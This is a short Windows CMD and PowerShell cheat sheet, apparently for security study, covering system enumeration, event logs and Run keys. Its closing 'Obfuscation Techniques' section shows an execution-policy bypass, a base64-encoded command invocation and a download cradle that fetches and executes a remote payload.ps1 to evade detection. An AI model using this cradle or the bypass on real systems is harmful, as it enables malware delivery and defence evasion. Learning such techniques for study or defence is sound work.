CMD and PowerShell¶

CMD is legacy but still functional
PowerShell is where the actual power lives because it's object-oriented not text-based like Unix shells and every command returns structured objects you can pipe , filter , and manipulate without regex gymnastics

CMD Essentials

dir /s /b C:\Users               # Recursive directory listing
dir /a                           # Show hidden/system files
type file.txt                    # Display file content
findstr "pattern" file.txt       # grep equivalent
net user                         # List local users
net localgroup administrators    # Admin group members
netstat -anob                    # Connections with PID
tasklist /v                      # Process list with details
schtasks /query /fo LIST /v      # Scheduled tasks
ipconfig /all                    # Full network configuration
systeminfo                       # Comprehensive system info

PowerShell Basics

Get-Command                       # List all cmdlets
Get-Help Get-Process -Examples   # Help system
Get-Process                       # Running processes
Get-Service                       # Windows services
Get-ChildItem C:\ -Recurse       # Recursive ls
Select-String "error" *.log      # grep equivalent

PowerShell for Security

# Event log analysis
Get-WinEvent -LogName Security -MaxEvents 100

# Check for admin users
Get-LocalGroupMember Administrators

# Network connections
Get-NetTCPConnection

# Running services
Get-Service | Where Status -eq "Running"

# Registry access
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run

Execution Policy

PowerShell restricts script execution by default

Get-ExecutionPolicy               # Check current policy
Set-ExecutionPolicy Bypass        # Allow all scripts (often needed)

Obfuscation Techniques

PowerShell enables easy obfuscation that bypasses basic detections

# Base64 encoded command
powershell -Enc <base64_string>

# Download cradle
IEX (New-Object Net.WebClient).DownloadString('http://host/payload.ps1')